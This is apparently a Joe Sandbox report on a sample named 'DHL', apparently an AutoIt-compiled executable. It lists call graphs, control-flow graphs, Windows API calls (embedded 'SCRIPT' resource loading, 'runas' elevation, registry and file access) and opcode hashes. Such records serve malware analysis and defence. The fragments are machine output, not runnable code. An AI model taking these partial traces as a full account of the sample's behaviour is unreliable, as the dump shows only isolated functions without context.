99168->99170 99171 9ae3e1 99168->99171 99172 a1359c 82 API calls 99168->99172 99173 9b04f0 22 API calls 99168->99173 99188 9aa81b 41 API calls 99168->99188 99189 9ba308 235 API calls 99168->99189 99194 9c0242 5 API calls __Init_thread_wait 99168->99194 99195 9c00a3 29 API calls __onexit 99168->99195 99196 9c01f8 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 99168->99196 99197 a247d4 235 API calls 99168->99197 99198 a268c1 235 API calls 99168->99198 99169->99168 99170->99168 99171->99130 99172->99168 99173->99168 99177 9bee09 99176->99177 99178 9bee12 99176->99178 99177->99130 99178->99177 99179 9bee36 IsDialogMessageW 99178->99179 99180 9fefaf GetClassLongW 99178->99180 99179->99177 99179->99178 99180->99178 99180->99179 99181->99130 99182->99130 99183->99130 99184->99130 99185->99138 99186->99138 99187->99138 99188->99168 99189->99168 99190->99168 99191->99157 99192->99165 99193->99168 99194->99168 99195->99168 99196->99168 99197->99168 99198->99168 99199 9d8402 99204 9d81be 99199->99204 99202 9d842a 99205 9d81ef try_get_first_available_module 99204->99205 99212 9d8338 99205->99212 99219 9c8e0b 40 API calls 2 library calls 99205->99219 99207 9d83ee 99223 9d27ec 26 API calls _abort 99207->99223 99209 9d8343 99209->99202 99216 9e0984 99209->99216 99211 9d838c 99211->99212 99220 9c8e0b 40 API calls 2 library calls 99211->99220 99212->99209 99222 9cf2d9 20 API calls __dosmaperr 99212->99222 99214 9d83ab 99214->99212 99221 9c8e0b 40 API calls 2 library calls 99214->99221 99224 9e0081 99216->99224 99218 9e099f 99218->99202 99219->99211 99220->99214 99221->99212 99222->99207 99223->99209 99225 9e008d __FrameHandler3::FrameUnwindToState 99224->99225 99226 9e009b 99225->99226 99229 9e00d4 99225->99229 99282 9cf2d9 20 API calls __dosmaperr 99226->99282 99228 9e00a0 99283 9d27ec 26 API calls _abort 99228->99283 99235 9e065b 99229->99235 99234 9e00aa __wsopen_s 99234->99218 99285 9e042f 99235->99285 99238 9e068d 99317 9cf2c6 20 API calls __dosmaperr 99238->99317 99239 9e06a6 99303 9d5221 99239->99303 99242 9e06ab 99244 9e06cb 99242->99244 99245 9e06b4 99242->99245 99243 9e0692 99318 9cf2d9 20 API calls __dosmaperr 99243->99318 99316 9e039a CreateFileW 99244->99316 99319 9cf2c6 20 API calls __dosmaperr 99245->99319 99249 9e06b9 99320 9cf2d9 20 API calls __dosmaperr 99249->99320 99250 9e00f8 99284 9e0121 LeaveCriticalSection __wsopen_s 99250->99284 99252 9e0781 GetFileType 99253 9e078c GetLastError 99252->99253 99254 9e07d3 99252->99254 99323 9cf2a3 20 API calls __dosmaperr 99253->99323 99325 9d516a 21 API calls 2 library calls 99254->99325 99255 9e0756 GetLastError 99322 9cf2a3 20 API calls __dosmaperr 99255->99322 99258 9e0704 99258->99252 99258->99255 99321 9e039a CreateFileW 99258->99321 99259 9e079a CloseHandle 99259->99243 99261 9e07c3 99259->99261 99324 9cf2d9 20 API calls __dosmaperr 99261->99324 99263 9e0749 99263->99252 99263->99255 99265 9e07f4 99266 9e0840 99265->99266 99326 9e05ab 72 API calls 3 library calls 99265->99326 99271 9e086d 99266->99271 99327 9e014d 72 API calls 4 library calls 99266->99327 99267 9e07c8 99267->99243 99270 9e0866 99270->99271 99272 9e087e 99270->99272 99273 9d86ae __wsopen_s 29 API calls 99271->99273 99272->99250 99274 9e08fc CloseHandle 99272->99274 99273->99250 99328 9e039a CreateFileW 99274->99328 99276 9e0927 99277 9e095d 99276->99277 99278 9e0931 GetLastError 99276->99278 99277->99250 99329 9cf2a3 20 API calls __dosmaperr 99278->99329 99280 9e093d 99330 9d5333 21 API calls 2 library calls 99280->99330 99282->99228 99283->99234 99284->99234 99286 9e046a 99285->99286 99287 9e0450 99285->99287 99331 9e03bf 99286->99331 99287->99286 99338 9cf2d9 20 API calls __dosmaperr 99287->99338 99290 9e045f 99339 9d27ec 26 API calls _abort 99290->99339 99292 9e04a2 99293 9e04d1 99292->99293 99340 9cf2d9 20 API calls __dosmaperr 99292->99340 99296 9e0524 99293->99296 99342 9cd70d 26 API calls 2 library calls 99293->99342 99296->99238 99296->99239 99297 9e051f 99297->99296 99299 9e059e 99297->99299 99298 9e04c6 99341 9d27ec 26 API calls _abort 99298->99341 99343 9d27fc 11 API calls _abort 99299->99343 99302 9e05aa 99304 9d522d __FrameHandler3::FrameUnwindToState 99303->99304 99346 9d2f5e EnterCriticalSection 99304->99346 99306 9d527b 99347 9d532a 99306->99347 99307 9d5234 99307->99306 99308 9d5259 99307->99308 99313 9d52c7 EnterCriticalSection 99307->99313 99350 9d5000 21 API calls 3 library calls 99308->99350 99311 9d52a4 __wsopen_s 99311->99242 99312 9d525e 99312->99306 99351 9d5147 EnterCriticalSection 99312->99351 99313->99306 99314 9d52d4 LeaveCriticalSection 99313->99314 99314->99307 99316->99258 99317->99243 99318->99250 99319->99249 99320->99243 99321->99263 99322->99243 99323->99259 99324->99267 99325->99265 99326->99266 99327->99270 99328->99276 99329->99280 99330->99277 99333 9e03d7 99331->99333 99332 9e03f2 99332->99292 99333->99332 99344 9cf2d9 20 API calls __dosmaperr 99333->99344 99335 9e0416 99345 9d27ec 26 API calls _abort 99335->99345 99337 9e0421 99337->99292 99338->99290 99339->99286 99340->99298 99341->99293 99342->99297 99343->99302 99344->99335 99345->99337 99346->99307 99352 9d2fa6 LeaveCriticalSection 99347->99352 99349 9d5331 99349->99311 99350->99312 99351->99306 99352->99349

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 235 9a42de-9a434d call 9aa961 GetVersionExW call 9a6b57 240 9e3617-9e362a 235->240 241 9a4353 235->241 243 9e362b-9e362f 240->243 242 9a4355-9a4357 241->242 246 9a435d-9a43bc call 9a93b2 call 9a37a0 242->246 247 9e3656 242->247 244 9e3632-9e363e 243->244 245 9e3631 243->245 244->243 248 9e3640-9e3642 244->248 245->244 264 9e37df-9e37e6 246->264 265 9a43c2-9a43c4 246->265 251 9e365d-9e3660 247->251 248->242 250 9e3648-9e364f 248->250 250->240 253 9e3651 250->253 254 9a441b-9a4435 GetCurrentProcess IsWow64Process 251->254 255 9e3666-9e36a8 251->255 253->247 257 9a4437 254->257 258 9a4494-9a449a 254->258 255->254 259 9e36ae-9e36b1 255->259 261 9a443d-9a4449 257->261 258->261 262 9e36db-9e36e5 259->262 263 9e36b3-9e36bd 259->263 266 9a444f-9a445e LoadLibraryA 261->266 267 9e3824-9e3828 GetSystemInfo 261->267 271 9e36f8-9e3702 262->271 272 9e36e7-9e36f3 262->272 268 9e36bf-9e36c5 263->268 269 9e36ca-9e36d6 263->269 273 9e37e8 264->273 274 9e3806-9e3809 264->274 265->251 270 9a43ca-9a43dd 265->270 280 9a449c-9a44a6 GetSystemInfo 266->280 281 9a4460-9a446e GetProcAddress 266->281 268->254 269->254 282 9e3726-9e372f 270->282 283 9a43e3-9a43e5 270->283 276 9e3704-9e3710 271->276 277 9e3715-9e3721 271->277 272->254 275 9e37ee 273->275 278 9e380b-9e381a 274->278 279 9e37f4-9e37fc 274->279 275->279 276->254 277->254 278->275 288 9e381c-9e3822 278->288 279->274 290 9a4476-9a4478 280->290 281->280 289 9a4470-9a4474 GetNativeSystemInfo 281->289 286 9e373c-9e3748 282->286 287 9e3731-9e3737 282->287 284 9a43eb-9a43ee 283->284 285 9e374d-9e3762 283->285 291 9a43f4-9a440f 284->291 292 9e3791-9e3794 284->292 293 9e376f-9e377b 285->293 294 9e3764-9e376a 285->294 286->254 287->254 288->279 289->290 295 9a447a-9a447b FreeLibrary 290->295 296 9a4481-9a4493 290->296 297 9e3780-9e378c 291->297 298 9a4415 291->298 292->254 299 9e379a-9e37c1 292->299 293->254 294->254 295->296 297->254 298->254 300 9e37ce-9e37da 299->300 301 9e37c3-9e37c9 299->301 300->254 301->254
                                                        APIs
                                                        • GetVersionExW.KERNEL32(?), ref: 009A430D
                                                          • Part of subcall function 009A6B57: _wcslen.LIBCMT ref: 009A6B6A
                                                        • GetCurrentProcess.KERNEL32(?,00A3CB64,00000000,?,?), ref: 009A4422
                                                        • IsWow64Process.KERNEL32(00000000,?,?), ref: 009A4429
                                                        • LoadLibraryA.KERNEL32(kernel32.dll,?,?), ref: 009A4454
                                                        • GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 009A4466
                                                        • GetNativeSystemInfo.KERNELBASE(?,?,?), ref: 009A4474
                                                        • FreeLibrary.KERNEL32(00000000,?,?), ref: 009A447B
                                                        • GetSystemInfo.KERNEL32(?,?,?), ref: 009A44A0
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1464884217.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
                                                        • Associated: 00000000.00000002.1464868271.00000000009A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465028726.0000000000A3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465028726.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465133098.0000000000A6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465163033.0000000000A74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_9a0000_DHL.jbxd
                                                        Similarity
                                                        • API ID: InfoLibraryProcessSystem$AddressCurrentFreeLoadNativeProcVersionWow64_wcslen
                                                        • String ID: GetNativeSystemInfo$kernel32.dll$|O
                                                        • API String ID: 3290436268-3101561225
                                                        • Opcode ID: a70e039f3fe9a80e2a9f1021cf454ae20e10b65799d90f0176c50f57ce2a48ff
                                                        • Instruction ID: 6fe14cd036985676519626d87c82e61a5173301e29031ed5bc51102e66416e90
                                                        • Opcode Fuzzy Hash: a70e039f3fe9a80e2a9f1021cf454ae20e10b65799d90f0176c50f57ce2a48ff
                                                        • Instruction Fuzzy Hash: AAA1C67290E2C0DFC792CBFDBC851957FE86B66700B04CC99E08D9FA62D2644987DB61

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 554 9a42a2-9a42ba CreateStreamOnHGlobal 555 9a42da-9a42dd 554->555 556 9a42bc-9a42d3 FindResourceExW 554->556 557 9a42d9 556->557 558 9e35ba-9e35c9 LoadResource 556->558 557->555 558->557 559 9e35cf-9e35dd SizeofResource 558->559 559->557 560 9e35e3-9e35ee LockResource 559->560 560->557 561 9e35f4-9e3612 560->561 561->557
                                                        APIs
                                                        • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?,?,?,?,?,009A50AA,?,?,00000000,00000000), ref: 009A42B2
                                                        • FindResourceExW.KERNEL32(?,0000000A,SCRIPT,00000000,?,?,009A50AA,?,?,00000000,00000000), ref: 009A42C9
                                                        • LoadResource.KERNEL32(?,00000000,?,?,009A50AA,?,?,00000000,00000000,?,?,?,?,?,?,009A4F20), ref: 009E35BE
                                                        • SizeofResource.KERNEL32(?,00000000,?,?,009A50AA,?,?,00000000,00000000,?,?,?,?,?,?,009A4F20), ref: 009E35D3
                                                        • LockResource.KERNEL32(009A50AA,?,?,009A50AA,?,?,00000000,00000000,?,?,?,?,?,?,009A4F20,?), ref: 009E35E6
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1464884217.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
                                                        • Associated: 00000000.00000002.1464868271.00000000009A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465028726.0000000000A3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465028726.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465133098.0000000000A6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465163033.0000000000A74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_9a0000_DHL.jbxd
                                                        Similarity
                                                        • API ID: Resource$CreateFindGlobalLoadLockSizeofStream
                                                        • String ID: SCRIPT
                                                        • API String ID: 3051347437-3967369404
                                                        • Opcode ID: 3b6999de2238bf9f316d1d0fb0c2732b0895076a52bfa9398e9a0d70000e1da1
                                                        • Instruction ID: 1c04e8255e49b9dec3e75038aca394dd842dc23bcc4eefb91278787d054abb28
                                                        • Opcode Fuzzy Hash: 3b6999de2238bf9f316d1d0fb0c2732b0895076a52bfa9398e9a0d70000e1da1
                                                        • Instruction Fuzzy Hash: 3F118E71240700BFD7219BA5DC48F677BBDEBC6B61F108569F812E6250DBB1DC018760

                                                        Control-flow Graph

                                                        APIs
                                                        • SetCurrentDirectoryW.KERNEL32(?), ref: 009A2B6B
                                                          • Part of subcall function 009A3A5A: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,00A71418,?,009A2E7F,?,?,?,00000000), ref: 009A3A78
                                                          • Part of subcall function 009A9CB3: _wcslen.LIBCMT ref: 009A9CBD
                                                        • GetForegroundWindow.USER32(runas,?,?,?,?,?,00A62224), ref: 009E2C10
                                                        • ShellExecuteW.SHELL32(00000000,?,?,00A62224), ref: 009E2C17
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1464884217.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
                                                        • Associated: 00000000.00000002.1464868271.00000000009A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465028726.0000000000A3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465028726.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465133098.0000000000A6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465163033.0000000000A74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_9a0000_DHL.jbxd
                                                        Similarity
                                                        • API ID: CurrentDirectoryExecuteFileForegroundModuleNameShellWindow_wcslen
                                                        • String ID: runas
                                                        • API String ID: 448630720-4000483414
                                                        • Opcode ID: f445db0fa643b4087818844a1b3bd233abb31aa5f7f987d599850c1fb6aa4ae3
                                                        • Instruction ID: c43120affed63491d70d012672cf604a9560890743659968a175e42728b5f9fd
                                                        • Opcode Fuzzy Hash: f445db0fa643b4087818844a1b3bd233abb31aa5f7f987d599850c1fb6aa4ae3
                                                        • Instruction Fuzzy Hash: 0111B9715083416BC714FF78DC56BBEB7A8AFD3350F44982DF186520A2DF25894AC792
                                                        APIs
                                                        • lstrlenW.KERNEL32(?,009E5222), ref: 00A0DBCE
                                                        • GetFileAttributesW.KERNELBASE(?), ref: 00A0DBDD
                                                        • FindFirstFileW.KERNELBASE(?,?), ref: 00A0DBEE
                                                        • FindClose.KERNEL32(00000000), ref: 00A0DBFA
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1464884217.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
                                                        • Associated: 00000000.00000002.1464868271.00000000009A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465028726.0000000000A3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465028726.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465133098.0000000000A6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465163033.0000000000A74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_9a0000_DHL.jbxd
                                                        Similarity
                                                        • API ID: FileFind$AttributesCloseFirstlstrlen
                                                        • String ID:
                                                        • API String ID: 2695905019-0
                                                        • Opcode ID: 5eb8726e414bd4784d2740cbd846dd313a53dec48d7fffbd212e545c9cc5f532
                                                        • Instruction ID: 03784fa6ff5681da0f26c758b06319141b388f681fad91c083fd498012141e3d
                                                        • Opcode Fuzzy Hash: 5eb8726e414bd4784d2740cbd846dd313a53dec48d7fffbd212e545c9cc5f532
                                                        • Instruction Fuzzy Hash: 51F0A03281092867D220ABF8AC0D8AB7B6C9E01334B104702F836D20E0EBB059568A95
                                                        APIs
                                                        • GetInputState.USER32 ref: 009AD807
                                                        • timeGetTime.WINMM ref: 009ADA07
                                                        • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 009ADB28
                                                        • TranslateMessage.USER32(?), ref: 009ADB7B
                                                        • DispatchMessageW.USER32(?), ref: 009ADB89
                                                        • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 009ADB9F
                                                        • Sleep.KERNEL32(0000000A), ref: 009ADBB1
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1464884217.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
                                                        • Associated: 00000000.00000002.1464868271.00000000009A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465028726.0000000000A3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465028726.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465133098.0000000000A6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465163033.0000000000A74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_9a0000_DHL.jbxd
                                                        Similarity
                                                        • API ID: Message$Peek$DispatchInputSleepStateTimeTranslatetime
                                                        • String ID:
                                                        • API String ID: 2189390790-0
                                                        • Opcode ID: 287a1801002e5bda5e41c1ffd34dc99e51fb210cbec08910ebe0ba931bf0f99c
                                                        • Instruction ID: 3da8c48c6e9fc8fecccaad9f25ee5dd15df1355df6c69b15308b5cde3b645636
                                                        • Opcode Fuzzy Hash: 287a1801002e5bda5e41c1ffd34dc99e51fb210cbec08910ebe0ba931bf0f99c
                                                        • Instruction Fuzzy Hash: 2B42F130609345DFD728CF24C894BBAB7E8BF86314F148919F59A876A1D774E884CBD2

                                                        Control-flow Graph

                                                        APIs
                                                        • GetSysColorBrush.USER32(0000000F), ref: 009A2D07
                                                        • RegisterClassExW.USER32(00000030), ref: 009A2D31
                                                        • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 009A2D42
                                                        • InitCommonControlsEx.COMCTL32(?), ref: 009A2D5F
                                                        • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 009A2D6F
                                                        • LoadIconW.USER32(000000A9), ref: 009A2D85
                                                        • ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 009A2D94
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1464884217.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
                                                        • Associated: 00000000.00000002.1464868271.00000000009A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465028726.0000000000A3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465028726.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465133098.0000000000A6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465163033.0000000000A74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_9a0000_DHL.jbxd
                                                        Similarity
                                                        • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                                        • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                                        • API String ID: 2914291525-1005189915
                                                        • Opcode ID: d0c5ebe26dde216705ad24450ea0130022c6320c04a35af3cbea48a52e3ecbe9
                                                        • Instruction ID: c90bcd59cc1de82327bb03f9d5506a048ebe26d36053a3513fd922aea0842016
                                                        • Opcode Fuzzy Hash: d0c5ebe26dde216705ad24450ea0130022c6320c04a35af3cbea48a52e3ecbe9
                                                        • Instruction Fuzzy Hash: C521D3B5911308AFDB00DFE8EC49B9DBBF4FB08714F00811AFA15B62A0D7B145828F90

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 303 9e065b-9e068b call 9e042f 306 9e068d-9e0698 call 9cf2c6 303->306 307 9e06a6-9e06b2 call 9d5221 303->307 314 9e069a-9e06a1 call 9cf2d9 306->314 312 9e06cb-9e0714 call 9e039a 307->312 313 9e06b4-9e06c9 call 9cf2c6 call 9cf2d9 307->313 322 9e0716-9e071f 312->322 323 9e0781-9e078a GetFileType 312->323 313->314 324 9e097d-9e0983 314->324 328 9e0756-9e077c GetLastError call 9cf2a3 322->328 329 9e0721-9e0725 322->329 325 9e078c-9e07bd GetLastError call 9cf2a3 CloseHandle 323->325 326 9e07d3-9e07d6 323->326 325->314 340 9e07c3-9e07ce call 9cf2d9 325->340 332 9e07df-9e07e5 326->332 333 9e07d8-9e07dd 326->333 328->314 329->328 334 9e0727-9e0754 call 9e039a 329->334 337 9e07e9-9e0837 call 9d516a 332->337 338 9e07e7 332->338 333->337 334->323 334->328 345 9e0839-9e0845 call 9e05ab 337->345 346 9e0847-9e086b call 9e014d 337->346 338->337 340->314 345->346 352 9e086f-9e0879 call 9d86ae 345->352 353 9e087e-9e08c1 346->353 354 9e086d 346->354 352->324 356 9e08e2-9e08f0 353->356 357 9e08c3-9e08c7 353->357 354->352 360 9e097b 356->360 361 9e08f6-9e08fa 356->361 357->356 359 9e08c9-9e08dd 357->359 359->356 360->324 361->360 362 9e08fc-9e092f CloseHandle call 9e039a 361->362 365 9e0963-9e0977 362->365 366 9e0931-9e095d GetLastError call 9cf2a3 call 9d5333 362->366 365->360 366->365
                                                        APIs
                                                          • Part of subcall function 009E039A: CreateFileW.KERNELBASE(00000000,00000000,?,009E0704,?,?,00000000,?,009E0704,00000000,0000000C), ref: 009E03B7
                                                        • GetLastError.KERNEL32 ref: 009E076F
                                                        • __dosmaperr.LIBCMT ref: 009E0776
                                                        • GetFileType.KERNELBASE(00000000), ref: 009E0782
                                                        • GetLastError.KERNEL32 ref: 009E078C
                                                        • __dosmaperr.LIBCMT ref: 009E0795
                                                        • CloseHandle.KERNEL32(00000000), ref: 009E07B5
                                                        • CloseHandle.KERNEL32(?), ref: 009E08FF
                                                        • GetLastError.KERNEL32 ref: 009E0931
                                                        • __dosmaperr.LIBCMT ref: 009E0938
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1464884217.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
                                                        • Associated: 00000000.00000002.1464868271.00000000009A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465028726.0000000000A3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465028726.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465133098.0000000000A6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465163033.0000000000A74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_9a0000_DHL.jbxd
                                                        Similarity
                                                        • API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
                                                        • String ID: H
                                                        • API String ID: 4237864984-2852464175
                                                        • Opcode ID: 7100a21517fd77b20794a314810c12340ffb762f3d0315b6d958962eb8e04491
                                                        • Instruction ID: 661907fde22a152ad8df290c1dfb32ee552f0eb87339d7a6bbc79045c1f49958
                                                        • Opcode Fuzzy Hash: 7100a21517fd77b20794a314810c12340ffb762f3d0315b6d958962eb8e04491
                                                        • Instruction Fuzzy Hash: 67A13632A001848FDF1AEFA8DC51BAE7BA4AB86320F14415DF815AF292C7719C53CB91

                                                        Control-flow Graph

                                                        APIs
                                                          • Part of subcall function 009A3A5A: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,00A71418,?,009A2E7F,?,?,?,00000000), ref: 009A3A78
                                                          • Part of subcall function 009A3357: GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 009A3379
                                                        • RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,\Include\), ref: 009A356A
                                                        • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 009E318D
                                                        • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000), ref: 009E31CE
                                                        • RegCloseKey.ADVAPI32(?), ref: 009E3210
                                                        • _wcslen.LIBCMT ref: 009E3277
                                                        • _wcslen.LIBCMT ref: 009E3286
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1464884217.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
                                                        • Associated: 00000000.00000002.1464868271.00000000009A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465028726.0000000000A3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465028726.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465133098.0000000000A6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465163033.0000000000A74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_9a0000_DHL.jbxd
                                                        Similarity
                                                        • API ID: NameQueryValue_wcslen$CloseFileFullModuleOpenPath
                                                        • String ID: Include$Software\AutoIt v3\AutoIt$\$\Include\
                                                        • API String ID: 98802146-2727554177
                                                        • Opcode ID: 0502cd8ec374e429c55806e2bdb275a8f472cfff30926e2b6b9b5f661603e5e6
                                                        • Instruction ID: 1284d7b79aaf03ce0a79ad319cc635eb1a700e985b7d72c7a2b2cd96f4616a04
                                                        • Opcode Fuzzy Hash: 0502cd8ec374e429c55806e2bdb275a8f472cfff30926e2b6b9b5f661603e5e6
                                                        • Instruction Fuzzy Hash: D87192715043009EC314DFA5DC85AABB7F8FFD5750F40882EF5899B1A0EB749A89CB92

                                                        Control-flow Graph

                                                        APIs
                                                        • GetSysColorBrush.USER32(0000000F), ref: 009A2B8E
                                                        • LoadCursorW.USER32(00000000,00007F00), ref: 009A2B9D
                                                        • LoadIconW.USER32(00000063), ref: 009A2BB3
                                                        • LoadIconW.USER32(000000A4), ref: 009A2BC5
                                                        • LoadIconW.USER32(000000A2), ref: 009A2BD7
                                                        • LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 009A2BEF
                                                        • RegisterClassExW.USER32(?), ref: 009A2C40
                                                          • Part of subcall function 009A2CD4: GetSysColorBrush.USER32(0000000F), ref: 009A2D07
                                                          • Part of subcall function 009A2CD4: RegisterClassExW.USER32(00000030), ref: 009A2D31
                                                          • Part of subcall function 009A2CD4: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 009A2D42
                                                          • Part of subcall function 009A2CD4: InitCommonControlsEx.COMCTL32(?), ref: 009A2D5F
                                                          • Part of subcall function 009A2CD4: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 009A2D6F
                                                          • Part of subcall function 009A2CD4: LoadIconW.USER32(000000A9), ref: 009A2D85
                                                          • Part of subcall function 009A2CD4: ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 009A2D94
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1464884217.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
                                                        • Associated: 00000000.00000002.1464868271.00000000009A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465028726.0000000000A3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465028726.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465133098.0000000000A6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465163033.0000000000A74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_9a0000_DHL.jbxd
                                                        Similarity
                                                        • API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
                                                        • String ID: #$0$AutoIt v3
                                                        • API String ID: 423443420-4155596026
                                                        • Opcode ID: 4b7b9eaf2cc22b5ff159dabf1909940ce03d6e3f0ee6594e1bb3ab9fb39c12f2
                                                        • Instruction ID: 0eafa2b344f4c31c29ea56e8f67127e7454aba27ccdd3127dae97b7e95122232
                                                        • Opcode Fuzzy Hash: 4b7b9eaf2cc22b5ff159dabf1909940ce03d6e3f0ee6594e1bb3ab9fb39c12f2
                                                        • Instruction Fuzzy Hash: FB210975E00314ABDB50DFE9EC59A997FF4FB48B54F00806AF508BA6A0D7B14586CF90

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
